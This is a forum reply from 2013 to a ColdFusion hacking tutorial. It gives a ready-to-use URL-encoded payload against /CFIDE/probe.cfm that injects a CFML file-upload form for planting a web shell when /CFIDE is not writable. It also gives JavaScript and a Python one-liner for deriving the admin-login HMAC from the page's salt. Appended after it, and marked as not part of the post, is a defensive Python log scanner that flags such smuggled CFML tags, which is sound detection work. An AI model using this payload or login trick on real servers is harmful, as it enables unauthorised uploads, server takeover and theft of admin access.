RE: ColdFusion Hacking Tutorial 02-21-2013, 03:12 PM
#4
Nice tutorial Cyber, although this is only 1 method on how to do it.
There's also another method. For example, if you failed to upload your shell it could be that /CFIDE is not writeable. But then it might be possible to subvert the outgoing firewall by exploiting a localhost XSS in probe.cfm.
To do this, add this to your URL:
Code:
www.site.com/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E
It exploits a zero-day XSS attack in probe.cfm.
Also, if the javascript:
Code:
jalert(hex_hmac_sha1(document.loginform.salt.value,document.loginform.cfadminPassword.value))
doesn't work, you can also use a python one-liner. Here it is:
Code:
python -c 'import hashlib,hmac; hash=raw_input("Hash > "); salt=raw_input("Salt > "); print "HMAC",hmac.new(salt,hash,hashlib.sha1).hexdigest().upper()'
To see the hash, view the source and CTRL+F 'salt' and paste it in there; you should get the password in HMAC form, and as you've said in your tutorial, do that with Tamper Data.
Even so, it's still a good tutorial for beginners.
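As an added example (not from the original post or from the tutorial it replies to), here is a small Python detector a defender could run over web-server access logs to flag the probe.cfm abuse described above: CFML tags or script smuggled into the `name` parameter. The log lines and the helper names are constructed for this example; the detector also decodes repeatedly so double-encoded payloads are not missed.

```python
# Added example: flag requests to /CFIDE/probe.cfm whose query parameters carry
# CFML or HTML constructs (cffile, cfif, script, form, ...). Log lines below
# are constructed for this example; the payload fragment mirrors the one above.
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs, unquote

# Tags that have no business inside a probe.cfm "name" value.
SUSPICIOUS = re.compile(
    r"<\s*/?\s*(cffile|cfif|cftry|cfexecute|cfscript|script|form)\b", re.I)

def decode_fully(value: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly so %253C (double-encoded '<') is still caught."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value

def inspect_request(path_and_query: str) -> Optional[dict]:
    """Return a finding for a suspicious probe.cfm request, else None."""
    parts = urlsplit(path_and_query)
    if not parts.path.lower().endswith("/cfide/probe.cfm"):
        return None
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes once
    for key, values in params.items():
        for raw in values:
            decoded = decode_fully(raw)
            match = SUSPICIOUS.search(decoded)
            if match:
                return {"param": key, "tag": match.group(1).lower(), "decoded": decoded}
    return None

def scan_log(lines) -> list:
    """Pull the request target out of combined-format log lines and inspect it."""
    hits = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m:
            finding = inspect_request(m.group(1))
            if finding:
                hits.append(finding)
    return hits

LOG = [  # constructed sample lines: benign, single-encoded, unrelated, double-encoded
    '10.0.0.5 - - [21/Feb/2013:15:12:00 +0000] "GET /CFIDE/probe.cfm?name=test HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Feb/2013:15:13:00 +0000] "GET /CFIDE/probe.cfm?name=%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%3E HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Feb/2013:15:14:00 +0000] "GET /CFIDE/administrator/index.cfm HTTP/1.1" 200 512',
    '10.0.0.9 - - [21/Feb/2013:15:15:00 +0000] "GET /CFIDE/probe.cfm?name=%253Cscript%253E HTTP/1.1" 200 512',
]
```

Run it with `scan_log(LOG)`; the second and fourth lines are reported, the benign and unrelated ones are not. Anything so flagged is worth correlating with file writes under the ColdFusion web root.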